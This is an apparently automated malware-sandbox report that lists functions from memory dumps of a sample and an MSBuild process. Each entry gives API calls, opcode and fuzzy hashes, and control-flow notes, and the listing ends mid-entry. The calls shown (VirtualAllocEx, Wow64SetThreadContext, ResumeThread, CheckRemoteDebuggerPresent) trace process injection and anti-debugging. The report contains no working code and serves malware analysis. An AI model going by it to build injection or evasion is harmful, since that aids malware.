                                              Function 023D9108 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 275 23d9108-23d915b 277 23d915d-23d9169 275->277 278 23d916b-23d919b Wow64SetThreadContext 275->278 277->278 280 23d919d-23d91a3 278->280 281 23d91a4-23d91d4 278->281 280->281
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023D918E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 30378b09338ce875166f7042cf125b9d810c3763813d539be3cb4feaff1a7001
                                              • Instruction ID: 6c27f1042e1a46c922f46f6825651427104fabdefe076a252ac1cec7cac2c7e3
                                              • Opcode Fuzzy Hash: 30378b09338ce875166f7042cf125b9d810c3763813d539be3cb4feaff1a7001
                                              • Instruction Fuzzy Hash: 28216872D002098FDB10CFAAC485BEEBBF4EF88324F14842ED419A7241CB789945CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9398 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 303 23d9398-23d9425 ReadProcessMemory 306 23d942e-23d945e 303->306 307 23d9427-23d942d 303->307 307->306
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023D9418
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 7bd68823d169e2565ad91f5881b788908ba5c9ce45309b3e149563906a34a6bb
                                              • Instruction ID: 6412e0c102eb158451d050b80b70ee43c8cc0b2b5f76322f95f0bcdc4a4c1f11
                                              • Opcode Fuzzy Hash: 7bd68823d169e2565ad91f5881b788908ba5c9ce45309b3e149563906a34a6bb
                                              • Instruction Fuzzy Hash: AD212871D003499FDB10CFAAC881BEEBBF5FF88720F108429E518A7241D779A500CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9110 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 293 23d9110-23d915b 295 23d915d-23d9169 293->295 296 23d916b-23d919b Wow64SetThreadContext 293->296 295->296 298 23d919d-23d91a3 296->298 299 23d91a4-23d91d4 296->299 298->299
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023D918E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 10298bad13d65ece7d670c81b3bc6197199d6846c3814ce7c5652f1730d39172
                                              • Instruction ID: 6e129a20e9cce11401460eeb50f96d8f4e01e0f199a0301eb519cd293e7e7b1a
                                              • Opcode Fuzzy Hash: 10298bad13d65ece7d670c81b3bc6197199d6846c3814ce7c5652f1730d39172
                                              • Instruction Fuzzy Hash: 32214971D003098FDB10CFAAC4857EEBBF4EF88724F148429D519A7241DB789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 311 aad300-aad394 DuplicateHandle 312 aad39d-aad3ba 311->312 313 aad396-aad39c 311->313 313->312
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAD387
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ac3b71e184e6094832e6c8a8e410ba48b04dcf9fe15b9c5115c2b62c4e648fe2
                                              • Instruction ID: 73d22abc0cd74c70b9bf4e4e4ac48a95c628cb9e86082c8ad706e72e31c0b1f6
                                              • Opcode Fuzzy Hash: ac3b71e184e6094832e6c8a8e410ba48b04dcf9fe15b9c5115c2b62c4e648fe2
                                              • Instruction Fuzzy Hash: 6721E3B5900248DFDB10CF9AD884ADEBBF4EB48720F14841AE918A7250D375A950CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D91E1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023D9256
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: b5aec955bb078ba90697367a741f803634b45eda302b666fdbf5f90540c00786
                                              • Instruction ID: 765923890823d50d3da0ddea3346541f3e09dfa260f71d18b5c93596cbfe7c6d
                                              • Opcode Fuzzy Hash: b5aec955bb078ba90697367a741f803634b45eda302b666fdbf5f90540c00786
                                              • Instruction Fuzzy Hash: AB11567290024D9FDB10DFAAC845BEFBFF5EF88720F148819E519A7250CB75A500CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AAB101,00000800,00000000,00000000), ref: 00AAB312
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 22eb811e615291deac9483b8aa0c5a42d6b128c5d1598773f270763129f335a6
                                              • Instruction ID: f400992cbb88c493b5c8382573ea9cf604b65544841def0592b96de2b3b44945
                                              • Opcode Fuzzy Hash: 22eb811e615291deac9483b8aa0c5a42d6b128c5d1598773f270763129f335a6
                                              • Instruction Fuzzy Hash: 271114B6C003499FDB10CF9AD444BDEFBF4EB88720F10842AE919A7241C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAB2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AAB101,00000800,00000000,00000000), ref: 00AAB312
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 976d3b55aef2448a49d55e1013ba69e5061fb819e9fd47e1589ab0aae5973948
                                              • Instruction ID: 92fc3d1affe305fe77525e2c1be88f8ade1b77725df7c2e46c0932f4b3bc2951
                                              • Opcode Fuzzy Hash: 976d3b55aef2448a49d55e1013ba69e5061fb819e9fd47e1589ab0aae5973948
                                              • Instruction Fuzzy Hash: D81114B6C006498FDB10CFAAD444BDEFBF4EF88720F10842AD919A7251C379A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D91E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023D9256
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 35b5a141e58b1c4e8a42cacac499bf0337c630da7424f1df24347e0f3524a6c6
                                              • Instruction ID: 291f2d5c4dd6534302b4dd339c599c2ca8f4cff3102d750fd4ae1bb54a990e03
                                              • Opcode Fuzzy Hash: 35b5a141e58b1c4e8a42cacac499bf0337c630da7424f1df24347e0f3524a6c6
                                              • Instruction Fuzzy Hash: 8E11237690024D9FDB10DFAAC845BEFBBF5EF88720F148819E519A7250CB75A940CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9058 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 19d81592bd1003a6cd6844982a9bcca8b403691fc42dd5a7a2dacee10e9b2534
                                              • Instruction ID: 067fd7093274c8476d3b28ab2b4a07e5e5bc0eba96bfccea85f231d96a73a019
                                              • Opcode Fuzzy Hash: 19d81592bd1003a6cd6844982a9bcca8b403691fc42dd5a7a2dacee10e9b2534
                                              • Instruction Fuzzy Hash: 87114671D002498FDB20DFAAD4457EEBFF4EF88720F148459D519A7240CB759540CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAB019 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 36a4df31c08969eeb461584252dab24d84996d44cfe623ff4b78d8ae2d5c2ac5
                                              • Instruction ID: 839c8898252822dd45efb05e381cfa20b165ff899f70dfa21bd0088a230234eb
                                              • Opcode Fuzzy Hash: 36a4df31c08969eeb461584252dab24d84996d44cfe623ff4b78d8ae2d5c2ac5
                                              • Instruction Fuzzy Hash: 371123B1C006498FCB20CFAAD444BDEFBF0AF89720F14845AD468A7241C379A945CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023D9060 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: c965a97abf64b48dcf53db6e252391b3fd95048896b954099864cd98b63b2f68
                                              • Instruction ID: 3620a557f76849ed4b8bbb6771f095c570748400b57d1bce14414a7389c5e2e2
                                              • Opcode Fuzzy Hash: c965a97abf64b48dcf53db6e252391b3fd95048896b954099864cd98b63b2f68
                                              • Instruction Fuzzy Hash: DE115571D003498FDB20DFAAD8457EEFBF4EF88720F248819D519A7240CB79A900CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00AAB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: bed588ce1e47be48725e7981ce0d4e67174c598f4df6e9d350cc7f25ff993b6d
                                              • Instruction ID: 7b9e66dd5286dc3477670ffd0a90d3a76f7eaf9e18968bfaed81e847bfaad528
                                              • Opcode Fuzzy Hash: bed588ce1e47be48725e7981ce0d4e67174c598f4df6e9d350cc7f25ff993b6d
                                              • Instruction Fuzzy Hash: E811D2B5C007498FDB20CF9AC444BDFFBF4AB89720F10845AD429A7651D375A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023DADBC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023DD435
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: f68c3cbf483794982457147c62daf6d814777bbe4e0e5cbc8c7bfee0a1fbb01d
                                              • Instruction ID: e7e59287b4fb7847b4438e6fa6b054ec94acade34d210f0c8b7541b1bbfeb3e3
                                              • Opcode Fuzzy Hash: f68c3cbf483794982457147c62daf6d814777bbe4e0e5cbc8c7bfee0a1fbb01d
                                              • Instruction Fuzzy Hash: 0411F2B690034DDFDB10CF9AD545BDEBBF8EB48720F10845AE918A7601C375A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023DD3D1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023DD435
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 69553979768cf8938a25782455e08de591848ce6a09c075dd2e87bc3849210e4
                                              • Instruction ID: 07377d70e4d2ad7a0d75416ae35837d4e7354df6791ffd9725ce9f02d929dcec
                                              • Opcode Fuzzy Hash: 69553979768cf8938a25782455e08de591848ce6a09c075dd2e87bc3849210e4
                                              • Instruction Fuzzy Hash: 261103B6800249DFDB10CF9AD485BDEBFF8EB48324F108459E958A7711C375A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A4D4C4 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49cea50aeb1058911e46e46ad04be695fd979f97922b37e52c77a61c3638efee
                                              • Instruction ID: 3f443b75811a3e8a451582d35199dd29b313f47eb0eab6a4c7871eac58a739a7
                                              • Opcode Fuzzy Hash: 49cea50aeb1058911e46e46ad04be695fd979f97922b37e52c77a61c3638efee
                                              • Instruction Fuzzy Hash: 61210376600240EFDB05DF14D9C0B26BFA5FBC8718F24C56DE9090B256C736D856CAA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A4D3D8 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 92fb4df45d6401e11b8f812c4f28da3c9ba9a0377c1028278a4c798dc06ffe59
                                              • Instruction ID: ef00e0e3cf6acecd29997671b1f2cb341e00ef438b186925c4d18a9d13852752
                                              • Opcode Fuzzy Hash: 92fb4df45d6401e11b8f812c4f28da3c9ba9a0377c1028278a4c798dc06ffe59
                                              • Instruction Fuzzy Hash: 2121257A500204EFDB05DF14D9C0B16BFA5FBD8324F24C56DE9090B256C33AE856CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A5D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3ff45f88f4e564144da0c975d4433c5d66bac8c9ab53cf782e33296af81056c
                                              • Instruction ID: 1fde6a0aa040f590e1fbf21d15ef95fea7eb9b97c9e1d2017813cfaf50ca5534
                                              • Opcode Fuzzy Hash: e3ff45f88f4e564144da0c975d4433c5d66bac8c9ab53cf782e33296af81056c
                                              • Instruction Fuzzy Hash: 6C210471504304EFDB25DF14D9C0B2ABBA5FB88715F24C6ADED094B292C376D84ACA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A5D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 764f12acd54f957f4ea47de2a508b0cc208bee04087612638f687a8ebed5068a
                                              • Instruction ID: b821f7172e2559ad37874d08c91f9ab4647fca83fda4bd603aa123300631f65f
                                              • Opcode Fuzzy Hash: 764f12acd54f957f4ea47de2a508b0cc208bee04087612638f687a8ebed5068a
                                              • Instruction Fuzzy Hash: 71212271604200EFDB24DF14D9C0B16BBA1FB88315F20C56DDC0A4B286C33AD80BCA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A5D005 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5cb41cfd52a714312ed67e3bfbb70b37dcac97cd522b7c189e49a891507c15c
                                              • Instruction ID: adc1622ae3b60a88cf297f1ba3ee60cd3c32eb2a8e1a9920ae19730436b1cb18
                                              • Opcode Fuzzy Hash: f5cb41cfd52a714312ed67e3bfbb70b37dcac97cd522b7c189e49a891507c15c
                                              • Instruction Fuzzy Hash: B22192755093C08FDB12CF20D990715BF71FB46314F28C5DAD8498B6A7C33A980ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A4D4BF Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: 76ef6cbbe14d554ecc3993d310b9bc7e5ce1bedad47dca699119133b4823f2ea
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: 3711D376504280CFCB15CF14D5C4B16BF71FBD4314F24C6A9D8494B656C33AD856CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A4D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction ID: d089b6db101ce3864af0113175d6dd82e22bf8c55e2218a106fca0c1e6c2985c
                                              • Opcode Fuzzy Hash: 7c1c52f64057ba31c7b3472a60d7ef901d747df3ca643598d73882777f3d56ec
                                              • Instruction Fuzzy Hash: 1911D376504280DFDB15CF14D5C4B16BF71FBD4324F24C6A9D8090B656C33AE856CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00A5D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction ID: 240362fc4ca4421339069d4d045249ecace8683a4e984d366d9a7996a50b7ce8
                                              • Opcode Fuzzy Hash: 57e3e11dd54d086b93e848213dee2e5cd9da70134201e791e4ff5700e7437990
                                              • Instruction Fuzzy Hash: C011BB75504280DFCB11CF10C5C0B19BBA1FB84314F24C6ADDC494B296C33AD84ACB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:8.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:13
                                              Total number of Limit Nodes:0
                                              execution_graph 15293 c9fe4a 15297 c9fe62 15293->15297 15301 c9fe70 15293->15301 15294 c9fe5a 15298 c9fe70 15297->15298 15299 c9ff0a CallWindowProcW 15298->15299 15300 c9feb9 15298->15300 15299->15300 15300->15294 15302 c9feb9 15301->15302 15303 c9feb2 15301->15303 15302->15294 15303->15302 15304 c9ff0a CallWindowProcW 15303->15304 15304->15302 15305 c970b0 15306 c970b2 CheckRemoteDebuggerPresent 15305->15306 15308 c97136 15306->15308

                                              Executed Functions

                                              Function 00C9FE70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 101 c9fe70-c9feac 102 c9ff5c-c9ff7c 101->102 103 c9feb2-c9feb7 101->103 109 c9ff7f-c9ff8c 102->109 104 c9feb9-c9fef0 103->104 105 c9ff0a-c9ff42 CallWindowProcW 103->105 112 c9fef9-c9ff08 104->112 113 c9fef2-c9fef8 104->113 106 c9ff4b-c9ff5a 105->106 107 c9ff44-c9ff4a 105->107 106->109 107->106 112->109 113->112
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C9FF31
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: dd0e4b9f965cf062b0bbf742f13ace134e94b52f9e9491fdaa9842953a09d64c
                                              • Instruction ID: 4353b7e25fc32db51ed3c522e0b1b3dbed5a34d36c593fbc6993010eaaa6826a
                                              • Opcode Fuzzy Hash: dd0e4b9f965cf062b0bbf742f13ace134e94b52f9e9491fdaa9842953a09d64c
                                              • Instruction Fuzzy Hash: AC413AB5900309CFCB14CF99C448AAABBF5FF88314F24C89CE519AB321D774A841CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00C970A8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 115 c970a8-c970aa 116 c970ac 115->116 117 c970ae 115->117 116->117 118 c970b0-c970b1 117->118 119 c970b2-c97134 CheckRemoteDebuggerPresent 117->119 118->119 121 c9713d-c97178 119->121 122 c97136-c9713c 119->122 122->121
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C97127
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: 47db3875a1b814691b3b4df5f6be55c5bb1864e50de0fcd4d1b04bf32929bde2
                                              • Instruction ID: 92ccf66fbe87c6e8b0004ae0d25ea4c0a78c992e6c701588773253cb00b398fb
                                              • Opcode Fuzzy Hash: 47db3875a1b814691b3b4df5f6be55c5bb1864e50de0fcd4d1b04bf32929bde2
                                              • Instruction Fuzzy Hash: 33213971811259CFDB10DF9AD844BEEBBF4EF48320F14855AE459A3251C778AA44CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00C970B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 c970b0-c97134 CheckRemoteDebuggerPresent 128 c9713d-c97178 125->128 129 c97136-c9713c 125->129 129->128
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C97127
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              • Opcode ID: 70c042fece0fa17b57673612895d31ffb685d45cdf76dd447a17ce9e808e2645
                                              • Instruction ID: f744513dd79ffce176f9f5e2522646195f12fd939f6f2f6f69d43ac6cb44f173
                                              • Opcode Fuzzy Hash: 70c042fece0fa17b57673612895d31ffb685d45cdf76dd447a17ce9e808e2645
                                              • Instruction Fuzzy Hash: 7A2137B2801259CFDB10CF9AD884BEEFBF4EF48320F14855AE459A3650D778A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00C4D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346295930.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c4d000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
